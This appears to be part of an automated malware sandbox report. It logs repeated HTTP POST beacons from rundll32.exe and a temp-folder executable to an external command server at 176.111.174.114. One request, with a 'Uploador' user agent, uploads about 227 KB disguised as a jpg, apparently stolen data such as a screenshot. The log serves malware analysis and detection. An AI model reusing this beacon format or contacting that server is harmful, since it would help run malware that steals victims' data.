                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          450 | 192.168.2.4 | 50020 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:21.973414898 CEST | 11876 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          451 | 176.111.174.114 | 80 | 192.168.2.4 | 50020 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:22.074280977 CEST | 11877 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:22 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
452 | 192.168.2.4 | 50021 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:22.288805962 CEST | 11877 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
453 | 176.111.174.114 | 80 | 192.168.2.4 | 50021 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:22.394026995 CEST | 11878 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:22 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
454 | 192.168.2.4 | 50022 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:22.612209082 CEST | 11878 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
455 | 176.111.174.114 | 80 | 192.168.2.4 | 50022 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:22.715763092 CEST | 11879 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:22 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
456 | 192.168.2.4 | 50023 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:22.925429106 CEST | 11879 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
457 | 176.111.174.114 | 80 | 192.168.2.4 | 50023 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:23.022763968 CEST | 11881 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
458 | 192.168.2.4 | 50024 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:23.150165081 CEST | 11895 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
459 | 192.168.2.4 | 50025 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:23.219957113 CEST | 11896 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
46 | 192.168.2.4 | 49771 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:17.921405077 CEST | 4544 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          460 | 176.111.174.114 | 80 | 192.168.2.4 | 50025 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:23.318248987 CEST | 11928 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          461 | 192.168.2.4 | 50027 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:23.531749964 CEST | 12091 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          462 | 176.111.174.114 | 80 | 192.168.2.4 | 50027 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:23.637419939 CEST | 12120 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          463 | 176.111.174.114 | 80 | 192.168.2.4 | 50024 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:23.662188053 CEST | 12121 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          464 | 192.168.2.4 | 50029 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:23.846836090 CEST | 12121 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          465 | 176.111.174.114 | 80 | 192.168.2.4 | 50029 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:23.944582939 CEST | 12122 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          466 | 192.168.2.4 | 50030 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:24.147510052 CEST | 12122 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          467 | 176.111.174.114 | 80 | 192.168.2.4 | 50030 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:24.248717070 CEST | 12123 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:24 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          468 | 192.168.2.4 | 50031 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:24.458761930 CEST | 12123 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          469 | 176.111.174.114 | 80 | 192.168.2.4 | 50031 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:24.555840015 CEST | 12124 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:24 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          47 | 176.111.174.114 | 80 | 192.168.2.4 | 49771 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:18.020920038 CEST | 4544 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          470 | 192.168.2.4 | 50032 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:24.800692081 CEST | 12124 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          471 | 176.111.174.114 | 80 | 192.168.2.4 | 50032 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:24.908600092 CEST | 12125 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:24 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          472 | 192.168.2.4 | 50034 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:25.131279945 CEST | 12125 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          473 | 176.111.174.114 | 80 | 192.168.2.4 | 50034 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:25.245347023 CEST | 12126 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:25 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
474 | 192.168.2.4 | 50035 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:25.482793093 CEST | 12127 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
475 | 176.111.174.114 | 80 | 192.168.2.4 | 50035 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:25.586595058 CEST | 12127 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:25 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
476 | 192.168.2.4 | 50036 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:25.801202059 CEST | 12127 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
477 | 176.111.174.114 | 80 | 192.168.2.4 | 50036 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:25.897419930 CEST | 12128 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:25 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
478 | 192.168.2.4 | 50037 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:26.105434895 CEST | 12129 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
479 | 176.111.174.114 | 80 | 192.168.2.4 | 50037 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:26.209476948 CEST | 12129 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:26 GMT
